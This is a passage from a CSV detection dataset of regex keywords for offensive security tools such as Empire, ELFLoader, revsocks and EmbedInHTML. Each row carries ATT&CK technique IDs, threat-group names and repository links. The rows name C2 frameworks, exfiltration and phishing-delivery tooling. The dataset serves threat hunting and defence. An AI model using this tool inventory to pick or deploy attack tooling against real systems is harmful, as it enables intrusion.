The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*ELFLoader.h*",".{0,1000}ELFLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*ELFLoader.out*",".{0,1000}ELFLoader\.out.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*elite-proxy-finder*",".{0,1000}elite\-proxy\-finder.{0,1000}","offensive_tool_keyword","elite-proxy-finder","Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. 
and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.","T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001","TA0011 - TA0010 - TA0005 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/DanMcInerney/elite-proxy-finder","1","1","N/A","N/A","3","247","98","2016-11-23T10:31:33Z","2014-04-17T11:23:20Z" "*ElliotKillick/LdrLockLiberator*",".{0,1000}ElliotKillick\/LdrLockLiberator.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","9","4","313","55","2024-04-28T21:16:21Z","2023-10-31T10:11:16Z" "*emailall.py -*",".{0,1000}emailall\.py\s\-.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*emailall.py check*",".{0,1000}emailall\.py\scheck.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*EmailAll-master.*",".{0,1000}EmailAll\-master\..{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" 
"*embedInHTML.html*",".{0,1000}embedInHTML\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*embedInHTML.py*",".{0,1000}embedInHTML\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*EmbedInHTML-master*",".{0,1000}EmbedInHTML\-master.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*emilarner/revsocks*",".{0,1000}emilarner\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*empire AttackServers*",".{0,1000}empire\sAttackServers.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Empire Framework GUI*",".{0,1000}Empire\sFramework\sGUI.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*empire --rest *",".{0,1000}empire\s\-\-rest\s.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire --server *",".{0,1000}empire\s\-\-server\s.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation 
Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*Empire.Agent.Coms.*",".{0,1000}Empire\.Agent\.Coms\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.cs*",".{0,1000}Empire\.Agent\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.Jobs.cs*",".{0,1000}Empire\.Agent\.Jobs\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.Stager.*",".{0,1000}Empire\.Agent\.Stager\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*empire/client/*.py*",".{0,1000}empire\/client\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/*.py*",".{0,1000}empire\/server\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 
T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/downloads/*",".{0,1000}empire\/server\/downloads\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - 
CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire_exec.py*",".{0,1000}empire_exec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*empire_server.*",".{0,1000}empire_server\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empireadmin*",".{0,1000}empireadmin.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - 
T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*empire-chain.pem*",".{0,1000}empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*EmpireCORSMiddleware*",".{0,1000}EmpireCORSMiddleware.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Empire-GUI.git*",".{0,1000}Empire\-GUI\.git.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" 
"*Empire-master*",".{0,1000}Empire\-master.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire-priv.key*",".{0,1000}empire\-priv\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 
